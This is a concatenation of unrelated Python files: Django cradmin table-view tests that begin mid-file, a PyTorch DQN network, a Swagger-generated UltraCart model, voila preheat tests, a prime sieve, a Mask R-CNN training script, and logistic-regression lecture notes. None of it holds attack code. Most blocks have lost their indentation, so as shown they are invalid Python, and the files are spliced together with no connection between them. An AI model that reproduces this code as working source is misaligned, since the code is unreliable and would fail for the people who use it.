paginate_by = 4
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'page': 2
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 4)
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .previous'))
self.assertTrue(selector.exists('#cradmin_legacy_contentwrapper .pager .next'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .previous.disabled'))
self.assertFalse(selector.exists('#cradmin_legacy_contentwrapper .pager .next.disabled'))
def test_render_single_simple_column(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 1)
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr>td'), 1)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td').alltext_normalized,
'Item One')
def test_render_multiple_simple_columns(self):
testmodels.SomeItem.objects.create(name='Item One', somenumber=10)
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name', 'somenumber']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 2)
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:first-child').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:last-child').alltext_normalized,
'Somenumber - Ordered descending - Click to order ascending')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr>td'), 2)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td:first-child').alltext_normalized,
'Item One')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td:last-child').alltext_normalized,
'10')
def test_render_order_ascending_singlecolumn(self):
testmodels.SomeItem.objects.create(name='Item A')
testmodels.SomeItem.objects.create(name='Item B')
testmodels.SomeItem.objects.create(name='Item C')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'a0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td').alltext_normalized,
'Item C')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered ascending - Click to order descending')
def test_render_order_descending_column(self):
testmodels.SomeItem.objects.create(name='Item A')
testmodels.SomeItem.objects.create(name='Item B')
testmodels.SomeItem.objects.create(name='Item C')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'd0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper thead').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td').alltext_normalized,
'Item C')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th').alltext_normalized,
'The name - Ordered descending - Click to order ascending')
def test_render_order_multicolumn(self):
testmodels.SomeItem.objects.create(name='Item A', somenumber=1)
testmodels.SomeItem.objects.create(name='Item B', somenumber=2)
testmodels.SomeItem.objects.create(name='Item C', somenumber=2)
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name', 'somenumber']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'ordering': 'a1.d0'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
# selector.one('#cradmin_legacy_contentwrapper thead').prettyprint()
self.assertEqual(selector.count('#objecttableview-table>thead>tr>th'), 2),
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:first-child').alltext_normalized,
'The name - Ordered descending - Click to order ascending - Ordering priority 2')
self.assertEqual(
selector.one('#objecttableview-table>thead>tr>th:last-child').alltext_normalized,
'Somenumber - Ordered ascending - Click to order descending - Ordering priority 1')
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 3)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:first-child>td:first-child').alltext_normalized,
'Item A')
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr:last-child>td:first-child').alltext_normalized,
'Item B')
def test_render_search_nomatch(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'search': 'Nothing matches this'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 0)
def test_render_search_match(self):
testmodels.SomeItem.objects.create(name='Item One')
testmodels.SomeItem.objects.create(name='Item Two')
testmodels.SomeItem.objects.create(name='Item Three')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
searchfields = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/test', {
'search': 'Item Two'
})
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertEqual(selector.count('#objecttableview-table>tbody>tr'), 1)
self.assertEqual(
selector.one('#objecttableview-table>tbody>tr>td').alltext_normalized,
'Item Two')
def test_show_column_headers(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertTrue(selector.exists('#objecttableview-table>thead'))
self.assertFalse(selector.exists('#objecttableview-table>thead.sr-only'))
def test_hide_column_headers(self):
testmodels.SomeItem.objects.create(name='Item One')
class MyObjectTableView(objecttable.ObjectTableView):
model = testmodels.SomeItem
columns = ['name']
hide_column_headers = True
def get_queryset_for_role(self, role):
return testmodels.SomeItem.objects.all()
request = self.factory.get('/')
self._mock_request(request)
response = MyObjectTableView.as_view()(request)
response.render()
selector = htmls.S(response.content)
self.assertTrue(selector.exists('#objecttableview-table>thead'))
self.assertTrue(selector.exists('#objecttableview-table>thead.sr-only'))
|
from abc import ABC, abstractmethod
from typing import Sequence, Tuple
import numpy as np
from torch import Tensor, nn
from ..prelude import Array, ArrayLike
from ..utils import Device
from .block import CNNBody, FCBody, LinearHead, NetworkBlock
from .prelude import NetFn
class ContinuousQFunction(ABC):
@abstractmethod
def q_value(self, states: ArrayLike, action: ArrayLike) -> Tensor:
pass
class DiscreteQFunction(ABC):
@abstractmethod
def q_value(self, state: Array, nostack: bool = False) -> Tensor:
pass
@property
@abstractmethod
def state_dim(self) -> Sequence[int]:
pass
@property
@abstractmethod
def action_dim(self) -> int:
pass
class DiscreteQValueNet(DiscreteQFunction, nn.Module):
"""State -> [Value..]"""
def __init__(
self,
body: NetworkBlock,
head: NetworkBlock,
device: Device = Device(),
do_not_use_data_parallel: bool = False,
) -> None:
if body.output_dim != np.prod(head.input_dim):
raise ValueError("body output and head input must have a same dimention")
super().__init__()
self.head = head
self.body = body
if not do_not_use_data_parallel and device.is_multi_gpu():
self.body = device.data_parallel(body) # type: ignore
self.device = device
self.to(self.device.unwrapped)
def q_value(self, state: Array, nostack: bool = False) -> Tensor:
if nostack:
return self.forward(state)
else:
return self.forward(np.stack([state]))
def forward(self, x: ArrayLike) -> Tensor:
x = self.device.tensor(x)
x = self.body(x)
x = self.head(x)
return x
@property
def state_dim(self) -> Sequence[int]:
return self.body.input_dim
@property
def action_dim(self) -> int:
return self.head.output_dim
def dqn_conv(*args, **kwargs) -> NetFn:
def _net(
state_dim: Tuple[int, int, int], action_dim: int, device: Device
) -> DiscreteQValueNet:
body = CNNBody(state_dim, *args, **kwargs)
head = LinearHead(body.output_dim, action_dim)
return DiscreteQValueNet(body, head, device=device)
return _net # type: ignore
def fc(*args, **kwargs) -> NetFn:
def _net(
state_dim: Sequence[int], action_dim: int, device: Device
) -> DiscreteQValueNet:
body = FCBody(state_dim[0], *args, **kwargs)
head = LinearHead(body.output_dim, action_dim)
return DiscreteQValueNet(body, head, device=device)
return _net
|
# coding: utf-8
"""
UltraCart Rest API V2
UltraCart REST API Version 2 # noqa: E501
OpenAPI spec version: 2.0.0
Contact: support@ultracart.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class EmailListSegmentMembership(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'email_list_uuid': 'str',
'email_segment_uuid': 'str',
'exclude': 'bool',
'name': 'str'
}
attribute_map = {
'email_list_uuid': 'email_list_uuid',
'email_segment_uuid': 'email_segment_uuid',
'exclude': 'exclude',
'name': 'name'
}
def __init__(self, email_list_uuid=None, email_segment_uuid=None, exclude=None, name=None): # noqa: E501
"""EmailListSegmentMembership - a model defined in Swagger""" # noqa: E501
self._email_list_uuid = None
self._email_segment_uuid = None
self._exclude = None
self._name = None
self.discriminator = None
if email_list_uuid is not None:
self.email_list_uuid = email_list_uuid
if email_segment_uuid is not None:
self.email_segment_uuid = email_segment_uuid
if exclude is not None:
self.exclude = exclude
if name is not None:
self.name = name
@property
def email_list_uuid(self):
"""Gets the email_list_uuid of this EmailListSegmentMembership. # noqa: E501
UUID identifying this email list or null if this is a segment # noqa: E501
:return: The email_list_uuid of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._email_list_uuid
@email_list_uuid.setter
def email_list_uuid(self, email_list_uuid):
"""Sets the email_list_uuid of this EmailListSegmentMembership.
UUID identifying this email list or null if this is a segment # noqa: E501
:param email_list_uuid: The email_list_uuid of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._email_list_uuid = email_list_uuid
@property
def email_segment_uuid(self):
"""Gets the email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
UUID identifying this email segment or null if this is a list # noqa: E501
:return: The email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._email_segment_uuid
@email_segment_uuid.setter
def email_segment_uuid(self, email_segment_uuid):
"""Sets the email_segment_uuid of this EmailListSegmentMembership.
UUID identifying this email segment or null if this is a list # noqa: E501
:param email_segment_uuid: The email_segment_uuid of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._email_segment_uuid = email_segment_uuid
@property
def exclude(self):
"""Gets the exclude of this EmailListSegmentMembership. # noqa: E501
true if customers from this list/segment is excluded from membership # noqa: E501
:return: The exclude of this EmailListSegmentMembership. # noqa: E501
:rtype: bool
"""
return self._exclude
@exclude.setter
def exclude(self, exclude):
"""Sets the exclude of this EmailListSegmentMembership.
true if customers from this list/segment is excluded from membership # noqa: E501
:param exclude: The exclude of this EmailListSegmentMembership. # noqa: E501
:type: bool
"""
self._exclude = exclude
@property
def name(self):
"""Gets the name of this EmailListSegmentMembership. # noqa: E501
Name of this email list or segment # noqa: E501
:return: The name of this EmailListSegmentMembership. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this EmailListSegmentMembership.
Name of this email list or segment # noqa: E501
:param name: The name of this EmailListSegmentMembership. # noqa: E501
:type: str
"""
self._name = name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(EmailListSegmentMembership, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, EmailListSegmentMembership):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
from . import infer # noqa
from . import inject # noqa
from . import reflect # noqa
from .analyses import NamespaceAnalysis # noqa
from .analyses import RowsTableDependencies # noqa
from .analyses import TableDependenciesAnalysis # noqa
from .reflect import StrictTableDependenciesAnalysis # noqa
from .targets import Function # noqa
from .targets import Materialization # noqa
from .targets import Rows # noqa
from .targets import Table # noqa
from .targets import Target # noqa
|
import pytest
import time
import asyncio
import os
BASE_DIR = os.path.dirname(__file__)
NOTEBOOK_EXECUTION_TIME = 3
NUMBER_PREHEATED_KERNEL = 2
TIME_THRESHOLD = 1
@pytest.fixture
def voila_config_file_paths_arg():
path = os.path.join(BASE_DIR, '..', 'configs', 'preheat')
return '--VoilaTest.config_file_paths=[%r]' % path
@pytest.fixture
def preheat_mode():
return True
@pytest.fixture
def voila_notebook(notebook_directory):
return os.path.join(notebook_directory, 'preheat', 'pre_heat.ipynb')
async def send_request(sc, url, wait=0):
await asyncio.sleep(wait)
real_time = time.time()
response = await sc.fetch(url)
real_time = time.time() - real_time
html_text = response.body.decode("utf-8")
return real_time, html_text
async def test_refill_kernel_asynchronously(http_server_client, base_url):
await asyncio.sleep(NUMBER_PREHEATED_KERNEL*NOTEBOOK_EXECUTION_TIME + 1)
fast = []
slow = []
for i in range(5*NUMBER_PREHEATED_KERNEL):
time, _ = await send_request(sc=http_server_client, url=base_url)
if time < TIME_THRESHOLD:
fast.append(time)
else:
slow.append(time)
assert len(fast) > 1
assert len(slow) > 1
assert len(fast) + len(slow) == 5*NUMBER_PREHEATED_KERNEL
await asyncio.sleep(NOTEBOOK_EXECUTION_TIME + 1)
async def test_env_variable_defined_in_kernel(http_server_client, base_url):
await asyncio.sleep(NUMBER_PREHEATED_KERNEL*NOTEBOOK_EXECUTION_TIME + 1)
_, text = await send_request(sc=http_server_client, url=base_url)
assert "bar" in text
await asyncio.sleep(NOTEBOOK_EXECUTION_TIME + 1)
|
# Let 'p' be a natural number; if there is no divisor of 'p' in the interval [2, sqrt(p)], then 'p' is prime.
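# A direct sketch of the criterion stated above (trial division up to sqrt(p)); illustrative only,
# since the generator below eliminates multiples sieve-style instead:
def eh_primo(p):
    if p < 2:
        return False
    for d in range(2, int(p ** 0.5) + 1):
        if p % d == 0:
            return False
    return True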
def gerador_de_primos(n):
numeros = range(3, n+1, 2)
primos = []
while len(numeros) > 0:
numero = numeros[0]
novo_set = set(numeros) - set(range(numero, n+1, numero))
numeros = sorted(novo_set)
primos.append(numero)
return primos
def contar_primos_entre(xi, xf):
primos = gerador_de_primos(xf)
primos_no_intervalo = [n for n in primos if xi <= n <= xf]
return len(primos_no_intervalo)
xi = int(input('xi: '))
xf = int(input('xf: '))
# print(gerador_de_primos(xf))
print(contar_primos_entre(xi, xf))
|
import os
import sys
import random
import math
import re
import time
import numpy as np
import cv2
import tensorflow as tf
import matplotlib
import matplotlib.pyplot as plt
#cell:
from tinyenv.flags import flags
_FLAGS = flags()
# cell_end.
# Call this first to load the parameters. If you are not using the tinymind service, delete this cell
sys.path.insert(0, '../libraries')
from mrcnn.config import Config
import mrcnn.utils as utils
import mrcnn.model as modellib
import mrcnn.visualize as visualize
from mrcnn.model import log
import mcoco.coco as coco
import mextra.utils as extra_utils
print("current work directory:%s" % os.getcwd())
def save_to_file(file_name, contents):
fh = open(file_name, 'w')
fh.write(contents)
fh.close()
save_to_file(_FLAGS.output_dir+'/mobiles.txt', os.getcwd())
#sys.chdir("master/")
tf.app.flags.DEFINE_string(
'HOME_DIR',
_FLAGS.HOME_DIR,
'the home directory,default value is "master"')
tf.app.flags.DEFINE_string(
'DATA_DIR',
_FLAGS.DATA_DIR,
'the data directory,default value is "master/data/shapes"')
tf.app.flags.DEFINE_string(
'TRAINED_WEIGHTS_DIR',
'master/data/trained_model',
    'the trained weights data directory, default value is "master/data/trained_model"')
tf.app.flags.DEFINE_string(
'SAVING_MODEL_DIR',
'master/data/logs',
    'where the model data is to be saved, default value is "master/data/logs"')
tf.app.flags.DEFINE_string(
'COCO_MODEL_PATH',
'master/data/trained_model/mask_rcnn_coco.h5',
'the data directory,default value is "master/data/trained_model/mask_rcnn_coco.h5"')
tf.app.flags.DEFINE_string(
'inititalize_weights_with',
'coco',
    'which dataset is used to acquire the initial weights, default value is "coco"')
tf.app.flags.DEFINE_integer(
'num_classes', _FLAGS.num_class, 'Number of classes to use in the dataset.')
tf.app.flags.DEFINE_float(
'learning_rate', _FLAGS.learning_rate,
'The learning rate used by a polynomial decay learning rate.')
# HOME_DIR = 'master'
# DATA_DIR = os.path.join(HOME_DIR, "data/shapes")
# WEIGHTS_DIR = os.path.join(HOME_DIR, "data/weights")
# MODEL_DIR = os.path.join(DATA_DIR, "logs")
# # Local path to trained weights file
# COCO_MODEL_PATH = os.path.join(WEIGHTS_DIR, "mask_rcnn_coco.h5")
# Download COCO trained weights from Releases if needed
# if not os.path.exists(COCO_MODEL_PATH):
# utils.download_trained_weights(COCO_MODEL_PATH)
def get_ax(rows=1, cols=1, size=8):
"""Return a Matplotlib Axes array to be used in
all visualizations in the notebook. Provide a
central point to control graph sizes.
Change the default size attribute to control the size
of rendered images
"""
_, ax = plt.subplots(rows, cols, figsize=(size*cols, size*rows))
return ax
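# Example usage (commented out, illustrative only): a 1x2 grid of axes for side-by-side plots.
# ax = get_ax(rows=1, cols=2, size=6)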
# dataset_train = coco.CocoDataset()
# dataset_train.load_coco(DATA_DIR, subset="shapes_train", year="2018")
# dataset_train.prepare()
# dataset_validate = coco.CocoDataset()
# dataset_validate.load_coco(DATA_DIR, subset="shapes_validate", year="2018")
# dataset_validate.prepare()
# dataset_test = coco.CocoDataset()
# dataset_test.load_coco(DATA_DIR, subset="shapes_test", year="2018")
# dataset_test.prepare()
# # Load and display random samples
# image_ids = np.random.choice(dataset_train.image_ids, 4)
# for image_id in image_ids:
# image = dataset_train.load_image(image_id)
# mask, class_ids = dataset_train.load_mask(image_id)
# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
image_size = 64
rpn_anchor_template = (1, 2, 4, 8, 16) # anchor sizes in pixels
rpn_anchor_scales = tuple(i * (image_size // 16) for i in rpn_anchor_template)
class ShapesConfig(Config):
"""Configuration for training on the shapes dataset.
"""
NAME = "shapes"
# Train on 1 GPU and 2 images per GPU. Put multiple images on each
# GPU if the images are small. Batch size is 2 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 1
# Number of classes (including background)
NUM_CLASSES = 1 + 3 # background + 3 shapes (triangles, circles, and squares)
# Use smaller images for faster training.
IMAGE_MAX_DIM = image_size
IMAGE_MIN_DIM = image_size
# Use smaller anchors because our image and objects are small
RPN_ANCHOR_SCALES = rpn_anchor_scales
# Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 32
STEPS_PER_EPOCH = 400
VALIDATION_STEPS = STEPS_PER_EPOCH / 20
def parse_and_config(self,FLAGS):
self.NAME = FLAGS.DATA_DIR.split('/')[-1]
self.NUM_CLASSES=FLAGS.num_classes
self.LEARNING_RATE = FLAGS.learning_rate
# config = ShapesConfig()
#config.display()
# model = modellib.MaskRCNN(mode="training", config=config, model_dir=MODEL_DIR)
# inititalize_weights_with = "coco" # imagenet, coco, or last
# if inititalize_weights_with == "imagenet":
# model.load_weights(model.get_imagenet_weights(), by_name=True)
# elif inititalize_weights_with == "coco":
# model.load_weights(COCO_MODEL_PATH, by_name=True,
# exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
# "mrcnn_bbox", "mrcnn_mask"])
# elif inititalize_weights_with == "last":
# # Load the last model you trained and continue training
# model.load_weights(model.find_last()[1], by_name=True)
# print("start training!")
# model.train(dataset_train, dataset_validate,
# learning_rate=config.LEARNING_RATE,
# epochs=2,
# layers='heads')
#fine tune
'''
model.train(dataset_train, dataset_validate,
learning_rate=config.LEARNING_RATE / 10,
epochs=3, # starts from the previous epoch, so only 1 additional is trained
layers="all")
'''
def main(_):
FLAGS = tf.app.flags.FLAGS
if not FLAGS.DATA_DIR:
raise ValueError('You must supply the dataset directory with --DATA_DIR')
COCO_MODEL_PATH = os.path.join(FLAGS.TRAINED_WEIGHTS_DIR, "mask_rcnn_coco.h5")
if not os.path.exists(COCO_MODEL_PATH):
utils.download_trained_weights(FLAGS.COCO_MODEL_PATH)
DATA_DIR = FLAGS.DATA_DIR
dataset_train = coco.CocoDataset()
dataset_train.load_coco(DATA_DIR, subset="shapes_train", year="2018")
dataset_train.prepare()
dataset_validate = coco.CocoDataset()
dataset_validate.load_coco(DATA_DIR, subset="shapes_validate", year="2018")
dataset_validate.prepare()
dataset_test = coco.CocoDataset()
dataset_test.load_coco(DATA_DIR, subset="shapes_test", year="2018")
dataset_test.prepare()
# image_ids = np.random.choice(dataset_train.image_ids, 4)
# for image_id in image_ids:
# image = dataset_train.load_image(image_id)
# mask, class_ids = dataset_train.load_mask(image_id)
# visualize.display_top_masks(image, mask, class_ids, dataset_train.class_names)
# image_size = 64
# rpn_anchor_template = (1, 2, 4, 8, 16) # anchor sizes in pixels
# rpn_anchor_scales = tuple(i * (image_size // 16) for i in rpn_anchor_template)
config = ShapesConfig()
config.parse_and_config(FLAGS)
model = modellib.MaskRCNN(mode="training", config=config, model_dir=FLAGS.SAVING_MODEL_DIR)
inititalize_weights_with = FLAGS.inititalize_weights_with # imagenet, coco, or last
if inititalize_weights_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif inititalize_weights_with == "coco":
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif inititalize_weights_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
model.train(dataset_train , dataset_validate,
learning_rate=config.LEARNING_RATE,
epochs=2,
layers='heads')
if __name__=='__main__':
tf.app.run()
|
####################################
# author: Gonzalo Salazar
# course: Python for Data Science and Machine Learning Bootcamp
# purpose: lecture notes
# description: Section 17 - Logistic Regression
# datasets: (i) Titanic: Machine Learning from Disaster (source: Kaggle),
# (ii) Advertising data: fake data.
####################################
### LOGISTIC REGRESSION ###
# We use it as a method for CLASSIFICATION since we are trying to predict discrete categories.
# For instance: (i) spam vs. ham emails; (ii) loan default (yes/no); or (iii) disease diagnosis
# Linear regression does not return good results when we are working with categories as dependent
# variables (e.g., a binary case) because it predicts results outside the scope of the categories
# (e.g., probabilities below 0 and above 1)
# Sigmoid (aka Logistic) Function takes any value and maps it to a number between 0 and 1.
# \phi(z) = 1/(1+e^{-z}), where z = b_0 + b_1 x (i.e., the linear model)
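#%%
# Illustrative sketch (not part of the original notes): the sigmoid squashes any z = b_0 + b_1*x
# into (0, 1), which is why its output can be read as a probability; the z values below are arbitrary.
import numpy as np
def sigmoid(z):
    return 1.0 / (1.0 + np.exp(-z))
print(sigmoid(np.array([-4.0, 0.0, 4.0])))  # ~[0.018, 0.5, 0.982]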
#%%
import os
#from numpy.lib.function_base import corrcoef
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import cufflinks as cf
cf.go_offline()
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
#%matplotlib inline
os.chdir('/Users/gsalazar/Documents/C_Codes/Learning-Python/Udemy_Py_DataScience_ML/logr_data')
#%%
train = pd.read_csv('titanic_train.csv')
test = pd.read_csv('titanic_test.csv')
# %%
# Brief descriptive statistics from the data
train.info()
train.describe()
# %%
train.head()
# %%
## Explanatory data analysis
# Checking for missing data
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
# Comment: we are missing some age info as well as a lot of cabin info. With the first
# we can fill in values taking into account other passengers with similar
# characteristics. In regard to cabin, it is not possible to fill in values, instead
# we might drop it or transform it to a binary variable (have cabin = 1, no cabin = 0)
# %%
# Describing the data we'll work with
sns.set_style('whitegrid')
sns.countplot(x = 'Survived', hue = 'Sex', data = train, palette = 'Greens')
# Comment: there is a clear tendency; men were much less likely to survive than women
# %%
sns.countplot(x = 'Survived', hue = 'Pclass', data = train)
# Comment: most passengers who did not survive belonged to the lowest class. Among the survivors,
#          passengers from the highest class appear to have had a better chance of surviving.
# %%
sns.displot(train['Age'].dropna(), kde = False, bins = 30, alpha = .4)
#train['Age'].plot.hist(bins = 30)
# Comment: roughly bi-modal distribution: a minor concentration of young passengers (5-15 yo.)
#          and the rest concentrated, mostly, between 20 and 35 yo.
# %%
sns.countplot(x = 'SibSp', data = train)
# Comment: most passengers had no siblings/spouses aboard, or just one (more probably a spouse)
# %%
sns.histplot(train['Fare'], bins = 40)
#train['Fare'].iplot(kind='hist',bins=30)
# Comment: related to the previous point. Smallest fares correspond to lower classes.
# %%
## Cleaning data: age will be imputed according to the average age on each Pclass
plt.figure(figsize = (10,7))
sns.boxplot(x = 'Pclass', y = 'Age', data=train)
mean_age = train.groupby('Pclass').mean()['Age']
def impute_age(cols):
Age = cols[0]
Pclass = cols[1]
if pd.isnull(Age):
if Pclass == 1:
return mean_age[1]
elif Pclass == 2:
return mean_age[2]
else:
return mean_age[3]
else:
return Age
train['Age'] = train[['Age','Pclass']].apply(impute_age,axis = 1) # axis = 1 applies the function
# row-wise, i.e. across the columns of each row
# %%
# Checking Age after imputation
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
# Dropping cabin column
train.drop('Cabin', axis = 1,inplace=True)
# %%
# Checking any remaining missing value and deleting it (in case these are just a few)
plt.figure(figsize=(10,10))
sns.heatmap(train.isnull(),yticklabels = False, cbar = False, cmap = 'Greens')
train.dropna(inplace=True)
#%%
# Encoding categorical values
sex = pd.get_dummies(train['Sex'],drop_first=True) # drop_first will drop one of the columns
# to avoid having perfect collinearity
embark = pd.get_dummies(train['Embarked'],drop_first=True)
pclass = pd.get_dummies(train['Pclass'],drop_first=True) # it is actually a categorical value
train = pd.concat([train,sex,embark,pclass],axis=1)
train.head()
#%%
# Dropping columns that we're not going to use
train.drop(['Sex','Name','Embarked','Ticket','PassengerId','Pclass'],axis=1,inplace=True)
train.head()
# %%
## Training and using the model (NOTICE: the train dataset is used as if it were the complete dataset)
# Establishing the data we'll work with as well as defining training and testing samples
X = train.drop('Survived', axis = 1)
y = train['Survived']
X_train, X_test, y_train, y_test = train_test_split(X,y,test_size = 0.3, random_state = 101)
# Instantiating a logistic regression model and training it
logm = LogisticRegression()
logm.fit(X_train,y_train)
#%%
# Predicting survival on the test set
predic = logm.predict(X_test)
# Checking performance
print('Classification Report')
print(classification_report(y_test,predic))
print('\nConfusion Matrix')
print(confusion_matrix(y_test,predic))
# Comment: performance can be increased by using the whole training.csv data as training data.
#          Also consider that more could be done by using NLP to extract information from
#          names (i.e., Dr., Mr., etc.) or ticket info that could point us to a specific
#          location on the Titanic.
del y, X, X_test, X_train, y_train, y_test, logm, predic
####################################################################################
# PROJECT EXERCISE - Advertisement
# This data set contains the following features:
# 'Daily Time Spent on Site': consumer time on site in minutes
# 'Age': customer age in years
# 'Area Income': Avg. Income of geographical area of consumer
# 'Daily Internet Usage': Avg. minutes a day consumer is on the internet
# 'Ad Topic Line': Headline of the advertisement
# 'City': City of consumer
# 'Male': Whether or not consumer was male
# 'Country': Country of consumer
# 'Timestamp': Time at which consumer clicked on Ad or closed window
# 'Clicked on Ad': 0 or 1 indicating whether the consumer clicked on the Ad
# %%
# Reading in the Advertising csv file as a DataFrame called ad_data
ad_data = pd.read_csv('Advertising.csv')
# Checking the head of ad_data
ad_data.head()
# %%
# Checking out its info() and describe() methods
ad_data.info()
ad_data.describe()
# %%
## EXPLORATORY DATA ANALYSIS
sns.set_style('whitegrid')
# Checking users' age
sns.histplot(ad_data['Age'],bins=30, alpha=.4)
# Comment: users are mostly 30 to 40 yo.
# %%
# Displaying relationship between Age and Area Income
sns.jointplot(y='Area Income', x='Age', data = ad_data,kind='reg',color='g')
# Comment: it appears that younger people are concentrated in a geographical
# area with higher avg. income
# %%
